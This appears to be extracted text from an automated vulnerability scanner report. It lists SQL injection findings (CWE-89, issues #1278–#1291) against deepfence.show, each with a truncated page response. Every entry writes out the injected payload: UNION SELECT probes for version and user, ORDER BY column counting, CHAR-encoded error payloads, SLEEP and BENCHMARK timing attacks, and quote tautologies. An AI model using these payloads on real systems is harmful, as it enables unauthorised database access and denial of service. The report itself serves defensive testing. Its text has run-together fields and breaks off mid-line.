window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1278\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1279\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1280\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1281\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or ''-'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1282\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 28#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1283\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 29--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1284\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1285Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1286\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AnD SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1287\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# (SELECT * FROM (SELECT(SLEEP(5)))ecMj)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1288\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# \")) or sleep(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1289\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1290\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1291\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or ''*'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = 